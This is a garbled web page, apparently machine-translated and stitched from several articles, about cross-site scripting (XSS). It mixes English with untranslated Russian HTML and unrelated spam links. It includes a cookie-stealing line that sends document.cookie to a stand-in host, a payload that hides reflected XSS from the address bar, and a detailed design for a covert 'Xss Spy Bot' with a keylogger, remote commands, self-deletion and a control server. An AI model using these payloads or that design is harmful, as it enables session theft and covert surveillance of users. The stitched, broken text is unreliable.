home Questions XSS attacks: what they are and why they are dangerous. XSS vulnerability - what is it? Examples of XSS vulnerabilities Xss injection

XSS attacks: what they are and why they are dangerous. XSS vulnerability - what is it? Examples of XSS vulnerabilities Xss injection

Cross-site scripting (XSS for short) is a widespread vulnerability affecting many web applications. It allows an attacker to inject malicious code to a website in such a way that the browser of the user visiting the site will execute this code.

Usually, to exploit such a vulnerability, some interaction with the user is required: either the user is lured to the infected site using social engineering, or just wait until he visits this site. Therefore, developers often do not take XSS vulnerabilities seriously.

But if they are not eliminated, this can pose a serious security risk.

Imagine that we are in the WordPress admin panel, we add new content. If we use an XSS-vulnerable plugin to do this, it can force the browser to create a new administrator, modify content, and perform other malicious actions. Cross-site scripting gives an attacker almost complete control over the most important software these days it's a browser.

XSS: Injection Vulnerability

Any website or application has multiple data entry points - form fields up to the URL itself. The simplest example of input is when we enter a username and password into a form:

Our name will be stored in the site database for subsequent interaction with us. Surely, when you were authorized on any site, you saw a personal greeting in the style of "Welcome, Ilya."

It is for such purposes that usernames are stored in the database.

An injection is a procedure when a special sequence of characters is entered instead of a name or password, forcing the server or browser to respond in a certain way that the attacker needs.

Cross-site scripting is an injection that injects code that will perform actions in the browser on behalf of a website. This can happen both with the notification of the user, and in the background, without his knowledge.

Traditional XSS attacks:

Reflected (non-permanent).

A reflected XSS attack is triggered when a user clicks on a specially crafted link.

These vulnerabilities occur when data provided by a web client, most commonly in HTTP request parameters or HTML form, are executed directly by server-side scripts to parse and display the results page for that client, without proper processing.

Stored (permanent).

Stored XSS is possible when an attacker manages to inject malicious code into a server that executes in the browser each time the original page is accessed. A classic example of this vulnerability is forums that allow comments in HTML format.

Vulnerabilities caused by client-side code (JavaScript, Visual Basic, Flash, etc.):

Also known as DOM models:

Reflected (non-permanent).

The same as in the case of the server side, only in this case the attack is possible due to the fact that the code is processed by the browser.

Stored (permanent).

Similar to stored XSS on the server side, only in this case the malicious component is stored on the client side using browser storage.

Examples of XSS vulnerabilities.

Interestingly, in most cases where this vulnerability is described, we are scared with the following code:

http://www.site.com/page.php?var=

There are two types of XSS vulnerabilities - passive and active.

Active Vulnerability is more dangerous, since the attacker does not need to lure the victim through a special link, he just needs to inject the code into the database or some file on the server. Thus, all site visitors automatically become victims. It can be integrated, for example, using SQL injection (SQL Injection). Therefore, you should not trust the data stored in the database, even if they were processed during insertion.

Example passive vulnerability can be found at the very beginning of the article. Social engineering is already needed here, for example, an important letter from the site administration with a request to check your account settings after restoring from a backup. Accordingly, you need to know the address of the victim or just arrange a spam mailing list or post on some forum, and it’s not even a fact that the victims will be naive and follow your link.

Moreover, both POST and GET parameters can be subject to passive vulnerability. With POST parameters, of course, you have to go for tricks. For example, a redirect from an attacker's site.

Therefore, the GET vulnerability is slightly more dangerous, because it is easier for the victim to notice the wrong domain than additional parameter(although the url can be encoded at all).

Stealing Cookies

This is the most commonly cited example of an XSS attack. Sites sometimes store some valuable information in Cookies (sometimes even the user's login and password (or its hash), but the most dangerous is the theft of the active session, so do not forget to click the "Exit" link on the sites, even if it is home computer. Fortunately, on most resources, the session lifetime is limited.

Varimg = new Image(); img.src = "http://site/xss.php?" +document.cookie;

Therefore, we introduced domain restrictions on XMLHttpRequest, but this is not scary for an attacker, since there are , <img>, <script>, background:url(); и т.п.</p> <h3>Кража данных из форм</h3> <p>Ищем форму через, например, getElementById и отслеживаем событие onsubmit. Теперь, перед отправкой формы, введенные данные отправляются также и на сервер злоумышленника.</p> <p>Этот тип атаки чем-то напоминает фишинг, только используется не поддельный сайт, а реальный, чем вызывается большее доверие жертвы.</p> <h3>DDoS-атака (распределенная атака типа «отказ в обслуживании»)</h3> <p>XSS-уязвимость на многопосещаемых ресурсах может быть использована для проведения DDoS-атаки. Суть проста - много запросов, которые не выдерживает атакуемый сервер.<br> Собственно отношение к XSS имеет косвенное, поскольку скрипты могут и не использоваться вовсе, достаточно конструкции вида:</p><p> <img src='https://i0.wp.com/site.com/' loading=lazy loading=lazy> </p><h2>В чем опасность XSS?</h2> <p>Как можно защитить свой сайт от XSS? Как проверить код на наличие уязвимости? Существуют технологии вроде Sucuri Firewall, специально разработанные для того, чтобы избежать подобных атак. Но если вы разработчик, вы, безусловно, захотите узнать подробнее, как идентифицировать и устранить XSS-уязвимости.</p> <p>Об этом мы поговорим в следующей части статьи, посвященной XSS.</p> <p>Что такое XSS-уязвимость? Стоит ли ее опасаться?</p> <p>Межсайтовый скриптинг (сокращенно XSS) - широко распространенная уязвимость, затрагивающая множество веб-приложений. Она позволяет злоумышленнику внедрить вредоносный код в веб-сайт таким образом, что браузер пользователя, зашедшего на сайт, выполнит этот код.</p> <p>Обычно для эксплуатации подобной уязвимости требуется определенное взаимодействие с пользователем: либо его заманивают на зараженный сайт при помощи социальной инженерии, либо просто ждут, пока тот сам посетит данный сайт. Поэтому разработчики часто не воспринимают всерьез XSS-уязвимости. Но если их не устранять, это может нести серьезную угрозу безопасности.</p> <p>Представим, что мы находимся в панели администратора WordPress, добавляем новый контент. Если мы используем для этого уязвимый к XSS плагин, он может заставить браузер создать нового администратора, видоизменить контент и выполнить другие вредоносные действия.</p> <p>Межсайтовый скриптинг предоставляет злоумышленнику практически полный контроль над самым важным программным обеспечением в наши дни - браузером.</p> <h2> XSS: Уязвимость для инъекции</h2> <p>Любой веб-сайт или приложение имеет несколько мест ввода данных -полей формы до самого URL. Простейший пример вводимых данных - когда мы вписываем имя пользователя и пароль в форму:</p> <p><b>Рисунок 1. Форма ввода данных </b></p> <p>Наше имя будет храниться в базе данных сайта для последующего взаимодействия с нами. Наверняка, когда вы проходили авторизацию на каком-либо сайте, вы видели персональное приветствие в стиле «Добро пожаловать, Илья». Именно для таких целей имена пользователей хранятся в базе данных.</p> <p>Инъекцией называется процедура, когда вместо имени или пароля вводится специальная последовательность символов, заставляющая сервер или браузер отреагировать определенным, нужным злоумышленнику образом.</p> <p>Межсайтовым скриптингом называется инъекция, внедряющая код, который будет выполнять действия в браузере от имени веб-сайта. Это может происходить как с уведомлением пользователя, так и в фоновом режиме, без его ведома.</p> <p><b>Рисунок 2. Наглядная схема межсайтового скриптинга </b></p> <p><img src='https://i0.wp.com/anti-malware.ru/files/xss-example-flow-diagram1.png' width="100%" loading=lazy loading=lazy></p> <p>В качестве простейшего примера можно привести элементарный скрипт, показывающий окно с уведомлением. Выглядит он примерно так:</p> <p><b>Таблица 1. Скрипт, вызывающий всплывающее окно </b></p> <p><script>alert(" ЭТО <span>XSS- </span>УЯЗВИМОСТЬ !!!")</script> </p> <p>This script calls up a window with the inscription "THIS IS XSS VULNERABILITY!!!". The user's browser accepts and executes this script as part of the site's legitimate code.</p> <h2>Types of XSS vulnerabilities</h2> <p>Not all XSS vulnerabilities are the same, there are many types. Here are the types and how they interact:</p> <p><b>Figure 3. Types of XSS vulnerabilities</b></p> <p><b><br><img src='https://i2.wp.com/anti-malware.ru/files/sucuri-blog-xss-types.png' width="100%" loading=lazy loading=lazy></b></p> <p><b>Vulnerabilities caused by server-side code (Java, PHP, .NET, etc.):</b></p> <p>Traditional XSS attacks:</p> <ol><li>Reflected (non-permanent). A reflected XSS attack is triggered when a user clicks on a specially crafted link. These vulnerabilities occur when data provided by a web client, most commonly in HTTP request parameters or in the form of HTML, is executed directly by server-side scripts to parse and display the results page for that client, without proper processing.</li> <li>Stored (permanent). Stored XSS is possible when an attacker manages to inject malicious code into a server that executes in the browser each time the original page is accessed. A classic example of this vulnerability is forums that allow comments in HTML format.</li> </ol><p><b>Vulnerabilities caused by client-side code (JavaScript, <a href="https://bar812.ru/en/ishodnye-kody-na-small-basic-yazyk-visual-basic-primery-napisaniya-koda-zapusk.html">Visual Basic</a>, Flash, etc.):</b></p> <p>Also known as DOM models:</p> <ol><li>Reflected (non-permanent). The same as in the case of the server side, only in this case the attack is possible due to the fact that the code is processed by the browser.</li> <li>Stored (permanent). Similar to stored XSS on the server side, only in this case the malicious component is stored on the client side using browser storage.</li> </ol><p><b>Vulnerabilities caused by infrastructure (browser, plugins, servers, etc.):</b></p> <p>They are very rare, but are more dangerous:</p> <ol><li>Infrastructure on the client side. Occurs when a malicious component performs any manipulations with the browser's functionality, for example, with its XSS filter, etc.</li> <li>Server side infrastructure. Occurs when the web server does not process requests correctly, allowing them to be modified.</li> <li>Net. Occurs when it is possible to infiltrate the communication between the client and the server.</li> </ol><p><b>Vulnerabilities caused by the user:</b></p> <ol><li>Self-XSS. Often occurs as a result of social engineering, when a user accidentally runs malicious code in their browser.</li> </ol><h2>What is the danger of XSS?</h2> <p>How can you protect your site from XSS? How to check the code for a vulnerability? There are technologies like the Sucuri Firewall specifically designed to avoid such attacks. But if you are a developer, you will definitely want to learn more about how to identify and fix XSS vulnerabilities. We will talk about this in the next part of the article devoted to XSS.</p> <p>Everyone has long known that most often, using XSS, an attacker tries to send the victim's Cookie, read CSRF tokens, carry out a phishing attack (creating a fake login form), perform some action on behalf of the user, and some other similar attacks (perhaps this is not all possibilities, but these are all the most popular known to me on <a href="https://bar812.ru/en/podrobnyi-obzor-i-testirovanie-apple-iphone-se-apple-iphone-se-2017-dizain.html">this moment</a>).</p> <p>The purpose of this method is to monitor the pages on behalf of the user that he navigates to on the attacked site, as well as monitor his keystrokes (you can also move and click the mouse, but for me it will be superfluous, not very useful information, in most cases for sure) . <br>Now, about the maximum benefit - I believe that the algorithm will be like this:</p> <ul><li>read and send cookies;</li> <li>read and send the rest of the information (IP address, <a href="https://bar812.ru/en/plagin-clr-browser-kak-skachat-i-ustanovit-plagin-dlya-open-broadcaster-software-obs.html">installed plugins</a>, browser version and type, flash support, silverlight support, etc.) [optional]</li> <li>get information about the internal network, break through the router [optional]</li> <li>read and send different tokens [optional];</li> <li>implement phishing [optional];</li> <li>do something with the “hands” of the user [optional];</li> <li>we continue to spy on him and get information until he closes the tab or leaves the site;</li> </ul><p>All optional list items IMHO should be performed depending on the situation and specific priorities for the goals to be achieved using XSS, they can sometimes interfere with each other (if you try to combine them, more precisely, perform one after the other) and increase the likelihood of XSS exploitation failing. <br>But here is the first <a href="https://bar812.ru/en/skolko-stoit-akkaunt-razrabotchika-google-play-kak-dobavlyat-igry-v-google-play.html">last paragraph</a> You should always do it, in any case. Actually, the main part of the article will be about the last item from this list.</p> <h3><u><b>We approach the goal.</b> </u></h3> <p>I'll start from afar: through JavaScript it is possible to change the path in <a href="https://bar812.ru/en/prilozhenie-zhesty-dlya-android-wristwhirl-prototip-umnyh-chasov-upravlyaemyh-zhestami-gorizontalnye.html">address bar</a> without reloading the page. For example, if a user loads a page at</p> <br>Then in the address bar the content will become the following (without reloading the page): <table class="crayon-table"><tr class="crayon-row"><td class="crayon-nums " data-settings="show"> </td> <td class="crayon-code"><p>http://site.com/new-url/</p> </td> </tr></table><br>This feature, by the way, is sometimes quite useful when you need to hide from users (or a more attentive category of users - admins) to quickly clean up the URL after they clicked on the link that contained Reflected XSS, so that later, after loading the page, looking in the address bar, found nothing. <table class="crayon-table"><tr class="crayon-row"><td class="crayon-nums " data-settings="show"> </td> <td class="crayon-code"><p>http : <span>//site.com/search.php?q=123<script> document . body . innerHTML += "Hacked" ; </script> </p> </td> </tr></table> <table class="crayon-table"><tr class="crayon-row"><td class="crayon-nums " data-settings="show"> </td> <td class="crayon-code"><p>http : <span>//site.com/search.php?q=123<script> window . history . pushState ("" , "" , "/" ) ; document . body . innerHTML += "Hacked" ; </script> </p> </td> </tr></table><br>we will deprive him of this opportunity. <p>But this technique has an even more interesting and powerful application. We will simulate the user's stay on the site after clicking on the link, in fact, he will remain on the same page all the time, and at this time a third-party script will work, extracting and sending information to the attacker. In this way, <b><u>XSS will work for as long as the user follows the link on this domain</u> </b>.</p> <h3><u><b>Let's define an idea.</b> </u></h3> <p>The general principle of operation is this: when a user enters a page with XSS, the script creates an iframe with the same address as this page and "attaches" it to the foreground, the user gets the impression that the page loaded normally, because the iframe can only be seen in the code pages.</p> <p>And the auxiliary script controls the logic of the spy bot, that is, it monitors when the address changes in the frame in order to change it in the address bar, but if there is another domain in the newly changed address of the frame, then you can open it on a new tab, or you will have to reload the page not to fall asleep. <br>Thus, in order for XSS to stop executing at the moment, the user must either refresh the page manually (if XSS is Reflected and passed <a href="https://bar812.ru/en/rodstvennye-svyazi-muzh-zhena-test-t-shcha-sv-kor-svekrov-dever.html">POST method</a>, in other cases, the update will not save, and by the way, some browsers now, when updating the page, can again send a POST request again) or close the tab or go to another domain (although in this case, you can still avoid losing control).</p> <p>If it goes to a subdomain of the attacked domain, then the attacker's choice, that is, XSS will work, but there is a small chance that the user will see a mismatch between the address. I think it’s due to the situation, for example, if the google.ru domain was attacked, the user switched to the Google cloud file service, which usually lies in the drive.google.ru subdomain, then the likelihood that he will notice a catch when looking at the address bar is quite high , <u>if he often used this service</u>. Otherwise, you can take risks. But we must take into account that we will no longer be able to read its data from a frame with a subdomain, since the Cross Origin Policy will not allow it. But we can safely climb the main domain on behalf of it in stealth mode (below, I will talk about this in more detail).</p> <p>Only this method has limitations, namely, it will not work if the site's web server responses contain the header <b>X-Frame-Options</b> with meaning <b>DENY</b>. But personally, I met such sites just a couple of times, now even half <b>SAMEORIGIN</b> not exhibited, not to mention a complete restriction through <i>DENY</i>.</p> <h3><u><b>We analyze the idea.</b> </u></h3> <p>Now many people have probably remembered such a wonderful thing as BeEF, which also has a lot of interesting things. So, by the way, there is also an option for a forced redirect of the user in the frame, but the address in the address bar does not change, which can quickly burn the desk and this option serves slightly different purposes. <br>In general, BeEF has almost everything you need and even a lot <a href="https://bar812.ru/en/dopolnitelnyi-vneshnii-akkumulyator-dlya-smartfona-portativnyi.html">additional features</a>, but personally I wanted additional functionality, namely:</p> <ul><li>the ability to monitor the code of pages that are available to the attacked user in real time;</li> <li>the ability to watch everything that he types on that site (from login and password, to hotkeys and messages), that is, keylogger on JS;</li> <li>the ability to give JS commands to your bot in real time, after viewing the code of the received pages;</li> <li>the ability to leave commands to the bot locally, so that he then “picks up” them and executes them without our direct participation;</li> <li>a lower probability of a bot sleeping, or the ability of a bot to “hide” from prying eyes;</li> </ul><p>As mentioned above, I decided to borrow the cool idea of the command execution queue from BeEF. For example, we analyzed the pages that the bot threw off when a privileged user climbed in his control panel with stored XSS, we leave commands to the bot - JS code, such as the next time the user comes in, click this button, write down such a value here, etc. , when this user next visits the page, the bot reads the commands and executes them, and we don’t have to be at his helm for everything - it’s very convenient.</p> <p>Basically, such a bot, of course, is designed for status users of some sites that have additional “levers” for managing content, other users, and so on. It can be seen from the functional requests that the server part is indispensable.</p> <h3><u><b>Let's implement the idea.</b> </u></h3> <p>In principle, this part of the article can be skipped, since it simply describes the process of implementing the desired bot and some of its details, in case someone wants to remake it or finish it for themselves. Although the bot at the beginning of the code will have variables through which you can set some settings. <br>First, the algorithm of the bot's actions from the moment of loading:</p> <p>1) Checking if the header exists <i>X-Frame-Options:DENY</i>(if there is, then we roll up the fishing rods); <br>2) Embedding a frame and setting up all the components of the bot; <br>3) Removing the script and all traces in the HTML code; <br>4) Establishing contact with the northern part and starting data forwarding, reacting to responses (receiving commands from the server);</p> <p>The first point was made not quite fully, that is, the bot checks only the first page and the root header. The fact is that usually these headers are embedded by the web server for all pages at once and very rarely that everything is done “manually” for a separate page. Yes, and this title itself is quite rare. Well, there is nothing special to say about the second and third, everything will be below.</p> <p>There are relatively <a href="https://bar812.ru/en/ekstra-tv-pakety-s-1-oktyabrya-oborudovanie-dlya-cifrovogo-televideniya---eto-to-chto-mozhno-kupit-v-nash.html">important point</a> that before adding the bot script code in your code, you need to get rid of the XSS signs in the address bar immediately (from the JS code), as this reduces the chances of detection and, most importantly, prevents the recursion that occurs when adding an address with the same XSS to the frame code, which in turn creates another frame with itself, and so on.</p> <p>But just in case, the bot code implements the ability to detect such frame recursion and prevent it at the first attempt to add a frame to an already created one, but it’s better not to rely only on it, but to additionally delete the code before loading the bot code. Although I haven't encountered any problems yet.</p> <p>Frame update check function. I tried several ways to economically solve this problem by hanging event handlers on <i>contentWindow</i> or <i>contentDocument</i>, but nothing worked, so I had to write a function that would check the address of the frame and compare it with the one saved before, and based on this decide whether the frame is updated (whether the address has changed) and then call itself recursively. <br><br>The frequency of such checks per second is controlled by the variable <i>delay</i>, which is specified at the beginning of the bot code file. But later, having already written it, I found a more efficient solution - use a simple solution and hang <i>onload</i> on the frame, so I left that function, but commented it out, in case it turns out to be more popular later.</p> <h3><u><b>Sending the HTML code of the page.</b> </u></h3> <p>Here the scheme is quite simple - after each reload of the frame (including the first load), the bot sends the entire HTML code of the page to the server along with its current address, so that later it can be distinguished whether the code belongs to the desired pages.</p> <p>The server implements the logic of storing pages - the server for each domain creates a folder with the name of this domain and saves all the data there. Page codes are saved and constantly updated on <a href="https://bar812.ru/en/skachat-eksplorer-10-russkaya-versiya-obnovlyaem-brauzer-internet-explorer-do.html">current versions</a>, but at the same time, a new copy of the page is created every new day so that you can control the version history if necessary. That is, for <i>/news.php</i> On September 1, the state will be updated, and on September 2, a copy of it will be created, only relevant for that day, and so every day again (if the user visits this page every day). The page name consists of the date and the path to this page relative to the site root (that is, without the domain).</p> <h3><u><b>Keylogger in JavaScript.</b> </u></h3> <p>The idea has already been implemented by some enthusiasts, but for me their developments were not suitable, if only because most of them were quite simple, that is, they detected the code of the pressed key and through <i>String.fromCharCode</i> translated into symbols. But this method has a number of disadvantages - control keys such as shift, control, space, etc., are not translated into any form (often just into an empty character), the interaction of alphanumeric keys with the shift is incorrectly logged, since this must be implemented programmatically, and also all pressed keys are displayed in <a href="https://bar812.ru/en/sql-like-opisanie-operatory-like-i-not-like-preobrazuem-znacheniya-v.html">upper case</a>, which can also be corrected programmatically.</p> <p>As a result, we got a keylogger that correctly detected all the keys of numbers, letters and basic characters, working on both layouts, reacting to the shift and logging all the main special keys. True, some signs (at the top <a href="https://bar812.ru/en/cifrovoi-dvoinik-ili-kiber-fizicheskaya-sistema-era-transformerov.html">digital series</a>, which are printed when the shift and number are pressed), may differ on some machines, as they were implemented according to the main standard, which some companies change. <br>Each portion of characters pressed is retained by the client until the text element loses focus. Then this portion is sent to the server, where it is stored in <a href="https://bar812.ru/en/vvod-dannyh-iz-faila-i-vyvod-v-fail-rabota-s-tekstovymi-failami-c.html">text file</a>, which will also be created every day with a new copy so that there is no growth to large sizes and you can quickly find what the user was typing at such a time. <br>In addition to the keys themselves, information about the element in which the text was typed is sent to the server with each portion (that is, whether it was <i><input>, <textarea>[ </i> or some <i><body> </i> when the user used hotkeys), in addition to the name of the element, its main data (id, name, class - if they are present) is sent so that it can then be easily found in the code. And of course, the address of the page on which the set was set and the approximate time of this set are recorded. AT <a href="https://bar812.ru/en/kak-ochistit-kesh-servera-1s-predpriyatie-8-3-obshchaya-informaciya-chto-takoe-kesh-i.html">general information</a> about the user's knocking on the keyboard, quite enough is sent for its subsequent analysis.</p> <h3><u><b>Command your bot.</b> </u></h3> <p>This process can be carried out by an attacker or on the side, where the server part of the bot will be launched, or even remotely. After running the server script, a self-written miniature web server starts, which serves the requests of the bot and its controller, which works through the web interface. That is, after starting the web server issues a link, by clicking on which you can start issuing commands to the bot.</p> <p>About this control panel. Firstly, it was necessary to restrict it with a password (the path and few people will know about the running service on such and such a port or about the address at which you need to go to use this service), so that the first time the server asks for a password, which is served in the address bar (an example will be given), the original password is stored in <i>password.txt</i>, which can be changed. After the first visit, the web server will instruct the browser to save the password in a cookie, so you don't have to worry about it further.</p> <p>On the page for sending commands to the bot, there is also information about the state of the bot - whether it is online or offline at the moment, and a couple of settings, the first of which is the host, that is, the IP address or domain of the site whose bot commands will be sent to. This is in case several sites will contain this bot so that they can be identified. On the server, also for this case, all data is divided into folders with domain names. <br>Next comes the window where to write commands to the bot in JS, and the option that sets where this JS code will be executed, on the main window, where the bot sits or in the frame - this is done for convenience, just in case.</p> <p>If the bot is not online, then the server simply saves the commands, and later, when the bot goes online, that is, the user visits the page with it again or follows the attacker's link, these commands will be executed. <br>This is very convenient if, during the first reconnaissance, the bot threw off all the pages visited by the user (for example, <a href="https://bar812.ru/en/mts-lichnyi-kabinet-cherez-nomer-lichnyi-kabinet-mts-rossiya-vhod-v.html">personal account</a>), having studied the code of which we compiled commands in JS, so that later the bot clicks on the links we need, enters the necessary data, displays the necessary pictures, etc., which will help achieve our goal.</p> <p>Or you can directly in real time, quickly view the contents of the pages through the code and give commands to the bot so that it sends the code of other pages, goes to a different address, etc. And all this will be done “behind the screen” by the user, who will calmly surf on site through a frame.</p> <p>For your convenience, you can form the most frequently used instructions into entire functions in JS, which are then entered into <a href="https://bar812.ru/en/ishodnyi-kod-faila-robots-txt-roboty-yandeksa-crawl-delay-sekundomer-dlya-slabyh.html">original file</a> bots ( <i>xsb.js</i>, more about the file structure below) and use. Or use already those of the functions that are embedded in the bot, although there is only a basic one and there is nothing new, but for example, you can use the function of sending the page code at any time, and not when the frame is reloaded. You can write a function that will open the links passed to it in new frames in the background in order to view the contents of several pages at once on behalf of the user (and operate on this content with his virtual hands).</p> <h3><u><b>Removing your own code.</b> </u></h3> <p>Well <a href="https://bar812.ru/en/spu-orb-poslednyaya-versiya-programmy-osnovnye-vozmozhnosti-i-dostoinstva.html">last chance</a> is implemented quite simply (it can be disabled by setting the desired variable in the file, they are commented out). The script, after setting up and hanging all event handlers, creating all variables and functions, deletes itself</p> <p>After all, all the data has already been loaded into <a href="https://bar812.ru/en/kak-proverit-novuyu-operativnuyu-pamyat-kak-opredelit-i-ustranit-neispravnost.html">RAM</a> through the browser, so nothing to worry about, but this is in theory, there may be some problems later that I did not take into account, so I rewarded a variable that can disable this feature if necessary.</p> <p>After removing all scripts, it will be extremely difficult to notice XSS, since the presence of a frame does not indicate this quite indirectly, and the code itself can only be found in the browser's network traffic history logs (which are not kept by default in many browsers if the developer panel is not open) .</p> <h3><u><b>Server part.</b> </u></h3> <p>For a simpler and more convenient way to launch the bot, it was decided to write our own small web server on sockets, which would serve the bot, provide all operations for accepting and placing sent data, transmit messages between the attacker and the bot, and create a web interface for the attacker to command . <br>The server was written in python, I tried to use only standard libraries so that I didn’t have to install anything before starting. Also, the server itself edits some data in the scripts, that is, in the JS script of the bot, you do not need to set the address of the command server, the web server itself will set the right one at startup. There is only one parameter in configuring the server - the port on which it will run (8000 by default). <br>After starting, the server will give out all the necessary data - a link to the JS script, which will need to be slipped, a link to the command panel, or rather links - to external and local addresses, for convenience.</p> <h3><u><b>The scheme of work with the bot.</b> </u></h3> <p>We start the server on some unclaimed port and you can send out a link with a bot script, then everyone who follows it will send you data that the server will save at any time of the day. Then you can simply view them if there is a need to leave the team bot and continue to do your own thing.</p> <h3><u><b>File structure.</b> </u></h3> <p>The folder contains the following files:</p> <ul><li><b>xsb.py</b>- the main file that implements the server part, run it for the bot to work, and then just use the link it offers;</li> <li><b>xsb.js</b>- the JS code of the bot is stored here, the link to which the server issues, at its beginning configuration variables are declared, which can be changed at your discretion (some, namely the host and port, the server will then set itself, you don’t have to worry);</li> <li><b>panel.html</b>- from here the server takes the code for the bot control panel, you can tweak the interface at your discretion;</li> <li><b>password.txt</b>- the password from the control panel is stored here, which can be changed;</li> <li><b>savedData</b> is a directory in which folders with site domains will be created, in which all information will be saved.</li> </ul><p>Once again, I note that in the file <i>xsb.js</i> you can add your own functions, which are then called through the panel, without writing huge portions of code;</p> <h3><u><b>A small analysis of the results.</b> </u></h3> <p>After writing my invented method of keeping the user on the page with XSS through frames (well, as invented - I personally discovered it for myself, it is quite possible that someone else “invented” this technique for themselves or it is already somewhere in the public shone, because now it’s quite difficult to develop something really new, and as a rule, after some time you find out that “it was already in The Simpsons”) I began to delve into BeEF'e in more detail and read its wiki. Then I discovered that another technique was implemented there to achieve the same goal - extending the user's time on the page with executable XSS (which was called there <i>man-in-the-browser</i>). And it was implemented like this: all links on the original page were changed in such a way that when clicking on any of them, the script did not reload the page, but sent a request to the server via Ajax and inserted the data received in the response, that is, it can be said to artificially update it, which was also almost indistinguishable from a regular refresh.</p> <p>Therefore, I was not the first to realize this idea (even if the methods turned out to be different). But both of these methods have their drawbacks:</p> <p>Loading method via <iframe>does not work if there is a header in the response <i>X-Frame-Options:DENY</i>, but the rest plows like a regular browser window;</p> <p>The ajax girlfriend method always works if the browser supports it (now all major browsers support it), but with the new Web 2.0 standard, more and more transitions are triggered by custom events of any elements via JS. One day I went to Google AdWords and decided to see how their HTML and JS interact there, because all my spiders were extremely bad at creating a map for this service. And I quietly freaked out all evening, how unusual everything was there, when <a href="https://bar812.ru/en/kak-chto-nibud-narisovat-poverh-video-faila-s-pomoshchyu-adobe-after-effects.html">text elements</a> were both buttons and switchers and sliders and were not depicted in any way, and on each hung somewhere around 30 handlers of different events.</p> <p>That is, on a heaped site, the transition button (subjectively a link) will be implemented through a regular tag <i><span> </i>, which is loaded with styles and on which event handlers are hung, one of which, for example, <i>onclick redirects the user to another page. Also have <a href="https://bar812.ru/en/kak-naiti-skrytye-papki-na-kompyutere-kak-naiti-skrytye-papki-poisk.html">standard elements</a> type [i] <input type=button> </i> or myself <i><button> </i> etc., which are also actually links to other pages, but to which BeEF will not respond and the page simply will not be updated when clicking on most buttons and other elements. Which might prompt the user to refresh the page or revisit "from the other side", which kills our active XSS session.</p> <p>For brevity of file naming, I called it - Xss Spy Bot.</p> <p>P.S. <br>This whole case was written for a little more than a month due to periodic lack of time and constant distractions. Also because of this, both the quality of the code and the likelihood of running into some kind of bug is quite high. So I ask you not to swear too much, but to unsubscribe, what is wrong with someone so that you can fix it. <br>I myself tested the bot on only 4 machines, all of them were running Debian.</p> <p>Long-term plans for this bot, if there is motivation: <br>- implement rendering of the code of the pages that the bot sends to the server, so that it opens immediately in the browser and can be "touched", tested on the fly; <br>- they will try to catch buns from WebRTC technology, that is, find ways to get new information that cannot be pulled out with pure JS; <br>- implement communication between the bot and the server via the WebSocket protocol over HTTP; <br>- add some convenience to the control panel;</p> <p>Last updated by at November 18, 2016 .</p> <p>Cross-site scripting (XSS) is a vulnerability that involves injecting client-side code (JavaScript) into a web page that other users are viewing.</p> <p>The vulnerability occurs due to insufficient filtering of the data that the user submits to be inserted into a web page. Much easier to understand <a href="https://bar812.ru/en/ustanovit-vindovs-10-na-chistyi-zhestkii-disk-kak-ustanovit-windows-napryamuyu.html">concrete example</a>. Remember any guest book - these are programs that are designed to accept data from the user and then display them. Let's imagine that the guest book does not check or filter the entered data in any way, but simply displays them.</p> <p>You can sketch out your simplest script (there is nothing easier than writing bad scripts in PHP - a lot of people do this). But there are already plenty of ready-made options. For example, I suggest getting started with Dojo and OWASP Mutillidae II. There is a similar example there. In a standalone Dojo environment, navigate in your browser to: http://localhost/mutillidae/index.php?page=add-to-your-blog.php</p> <p>If one of the users entered:</p><p>Then the web page will display:</p><p>Hello! Like your site.</p><p>And if the user enters like this:</p><p>Hello! Like your site.<script>alert("Pwned")</script> </p><p>It will display like this:</p> <p><img src='https://i1.wp.com/hackware.ru/wp-content/uploads/2016/06/x02-6.jpg.pagespeed.ic.1-A3eqySoq.jpg' width="100%" loading=lazy loading=lazy></p> <p>Browsers store many cookies from a large number of sites. Each site can only receive cookies stored by itself. For example, example.com has stored some cookies in your browser. You go to another.com, that site (client and server scripts) cannot access the cookies stored by example.com.</p> <p>If example.com is vulnerable to XSS, then this means that we can somehow inject JavaScript code into it, and this code will be executed on behalf of example.com! Those. this code will, for example, access cookies from the site example.com.</p> <p>I think everyone remembers that JavaScript is executed in users' browsers, i.e. in the presence of XSS, the injected malicious code gains access to the data of the user who opened the website page.</p> <p>The injected code can do everything that JavaScript can, namely:</p> <ul><li>accesses cookies from the site you are browsing</li> <li>may make any changes to <a href="https://bar812.ru/en/radeon-r3-harakteristiki-karty-na-noutbuke-vneshnii-vid-i-tehnicheskaya-specifikaciya.html">appearance</a> pages</li> <li>accesses the clipboard</li> <li>can inject JavaScript programs, such as keyloggers (keystroke interceptors)</li> <li>hook up on BeEF</li> <li>and etc.</li> </ul><p>The simplest example with cookies:</p><p> <script>alert(document.cookie)</script> </p><p>In fact, <b>alert</b> used only for XSS detection. The real malicious payload performs covert actions. She secretly associates with <a href="https://bar812.ru/en/debugging-tools-for-windows-ispolzovanie-ustanovka-i-nastroika-windbg-dlya.html">remote server</a> attacker and transfers the stolen data to him.</p> <h2>Types of XSS <br></h2> <p>The most important thing to understand about XSS types is that they are:</p> <ul><li>Stored (Permanent)</li> <li>Reflected (Non-permanent)</li> </ul><p>Constants example:</p> <ul><li>A specially crafted guestbook message entered by an attacker (comment, forum post, profile) that is stored on the server is downloaded from the server each time users request that the page be displayed.</li> <li>An attacker gained access to server data, for example, through <a href="https://bar812.ru/en/inurl-single-php-id-chaemyi-instrukciya-po-ispolzovaniyu-jsql-injection-mnogofunkcionalnogo.html">SQL injection</a>, and injected malicious JavaScript code (with keyloggers or with BeEF) into the data issued to the user.</li> </ul><p>Non-persistent example:</p> <ul><li>There is a search on the site, which, along with the search results, shows something like "You searched for: [search string]", while the data is not filtered properly. Since such a page is displayed only to those who have a link to it, until the attacker sends the link to other users of the site, the attack will not work. Instead of sending a link to the victim, one can use hosting a malicious script on a neutral site that the victim visits.</li> </ul><p>They also distinguish (some as a type of non-persistent XSS vulnerabilities, some say that this type can also be a type of persistent XSS):</p> <ul><li>DOM Models</li> </ul><h2>Features of DOM based XSS <br></h2> <p>To put it quite simply, we can see the malicious code of “normal” non-persistent XSS if we open the HTML code. For example, a link is formed like this:</p><p>http://example.com/search.php?q="/><script>alert(1)</script> </p><p>And when opening the source HTML code, we see something like this:</p><p> <div class="m__search"> <form method="get" action="/search.php"> <input type="text" class="ui-input query" name="q" value=""/><script>alert(1)</script>" /> <button type="submit" class="ui-button">Find</button> </form> </p><p>And DOM XSS change the DOM structure, which is formed in the browser on the fly, and we can see the malicious code only when viewing the formed DOM structure. The HTML does not change. 